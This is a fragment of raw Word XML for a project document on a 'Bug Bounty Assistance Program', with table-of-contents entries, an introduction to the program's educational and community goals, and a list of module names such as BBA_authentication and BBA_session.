              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500841" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_Test</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500841 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500842" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_Weak</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500842 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500843" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Define docker image costume</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500843 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500844" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Define checklist</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500844 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500845" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.ReconBBassist.py</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500845 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="004F3AB4" w:rsidRDefault="004F3AB4">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="004F3AB4" w:rsidRDefault="004F3AB4" w:rsidP="004F3AB4"/>
    <w:p w:rsidR="004F3AB4" w:rsidRDefault="004F3AB4"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4B2C60" w:rsidRDefault="004B2C60" w:rsidP="004F3AB4"/>
    <w:p w:rsidR="002E4190" w:rsidRPr="002E4190" w:rsidRDefault="002E4190" w:rsidP="004B2C60">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc166500827"/>
      <w:r w:rsidRPr="002E4190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00B2216E" w:rsidRPr="002E4190" w:rsidRDefault="00B2216E" w:rsidP="002E4190"/>
    <w:p w:rsidR="002E4190" w:rsidRPr="002E4190" w:rsidRDefault="002E4190" w:rsidP="002E4190"/>
    <w:p w:rsidR="002E4190" w:rsidRDefault="002E4190" w:rsidP="002E4190">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E4190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Bug Bounty Assistance Program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C61CA" w:rsidRDefault="002C61CA" w:rsidP="002C61CA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C61CA" w:rsidRPr="002E4190" w:rsidRDefault="002C61CA" w:rsidP="002C61CA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002E4190">
        <w:t>The Bug Bounty Assistance Program (BBAP) aims to empower security hunters by providing them with the knowledge, resources, and support they need to excel in the field of ethical hacking. By offering educational materials, mentorship, tools, and a collaborative community, the BBAP seeks to lower barriers to entry and foster the growth of a vibrant bug bounty community. Through its efforts, the BBAP ultimately contributes to the collective goal of making digital systems more secure, protecting both organizations and individuals from cyber threats. In an era where cybersecurity is paramount, initiatives like the BBAP are crucial in building a safer digital world.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C61CA" w:rsidRPr="002E4190" w:rsidRDefault="002C61CA" w:rsidP="002E4190"/>
    <w:p w:rsidR="002E4190" w:rsidRPr="002E4190" w:rsidRDefault="002E4190" w:rsidP="002E4190">
      <w:r w:rsidRPr="002E4190">
        <w:t>The Bug Bounty Assistance Program (BBAP) aims to address these challenges and create an environment conducive to both seasoned security hunters and newcomers alike. It operates on several fundamental principles:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4190" w:rsidRPr="002E4190" w:rsidRDefault="002E4190" w:rsidP="002E4190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E4190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Education and Training</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4190">
        <w:t>: The BBAP will offer comprehensive educational resources and training modules. These resources will cover various aspects of bug hunting, including web application security, network security, and mobile application security. Educational materials will be available in various formats, such as written guides, video tutorials, and interactive courses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4190" w:rsidRPr="002E4190" w:rsidRDefault="002E4190" w:rsidP="002E4190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E4190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mentorship and Support</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4190">
        <w:t>: To help newcomers navigate the complexities of bug bounty programs, the BBAP will establish a mentorship system. Experienced security researchers will volunteer their time to guide and assist newcomers, providing valuable insights and advice.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4190" w:rsidRPr="002E4190" w:rsidRDefault="002E4190" w:rsidP="002E4190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E4190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4190">
        <w:t>: A centralized repository of tools, scripts, and resources will be maintained. Security hunters can access this repository to streamline their testing processes, making their bug hunting more efficient and productive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4190" w:rsidRPr="002E4190" w:rsidRDefault="002E4190" w:rsidP="002E4190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E4190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Platform Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4190">
        <w:t xml:space="preserve">: The BBAP will collaborate with major bug bounty platforms (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E4190">
        <w:t>HackerOne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E4190">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E4190">
        <w:t>Bugcrowd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E4190">
        <w:t>) to facilitate seamless integration. Researchers can access program details, submit reports, and receive feedback directly from within the BBAP platform.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4190" w:rsidRPr="002E4190" w:rsidRDefault="002E4190" w:rsidP="002E4190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E4190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Community Forums</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4190">
        <w:t>: The BBAP will host community forums where security hunters can collaborate, share knowledge, and discuss their experiences. These forums will serve as a hub for networking and building a sense of camaraderie among bug bounty enthusiasts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4190" w:rsidRPr="002E4190" w:rsidRDefault="002E4190" w:rsidP="002E4190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E4190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recognition and Rewards</w:t>
      </w:r>
      <w:r w:rsidRPr="002E4190">
        <w:t>: To incentivize and acknowledge the contributions of security hunters, the BBAP will maintain a leaderboard and recognize top performers. Furthermore, the program will periodically host bug bounty challenges and competitions with attractive prizes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F3AB4" w:rsidRDefault="004F3AB4" w:rsidP="002C61CA"/>
    <w:p w:rsidR="004F3AB4" w:rsidRDefault="004F3AB4" w:rsidP="001916DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00345EDC" w:rsidRDefault="00345EDC" w:rsidP="00345EDC"/>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00345EDC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Instructure of Prog:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00345EDC"/>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00345EDC">
      <w:r>
        <w:t>Review:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00345EDC"/>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00E24F92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check for vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00E24F92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Test and exploit vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00E24F92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>report for vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00E24F92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00E24F92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00E24F92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>telegram Bot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173DB4" w:rsidRDefault="00173DB4" w:rsidP="00173DB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E24F92" w:rsidRDefault="00E24F92" w:rsidP="00345EDC"/>
    <w:p w:rsidR="00345EDC" w:rsidRDefault="00345EDC" w:rsidP="00345EDC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc166500828"/>
      <w:r>
        <w:t>BBAP version 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00345EDC" w:rsidRDefault="00345EDC" w:rsidP="00345EDC"/>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_APITesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_authentication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_authorization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_businessL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_Client_side</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_configuration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_ErrorH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_identify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_inputV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_Report</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_TeleBot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_Test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006373E4" w:rsidRDefault="006373E4" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BBA_Weak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>BBA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="006373E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>infoTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>learning_and_sites</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>table.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35931" w:rsidRDefault="00A35931" w:rsidP="00A35931">
      <w:pPr>
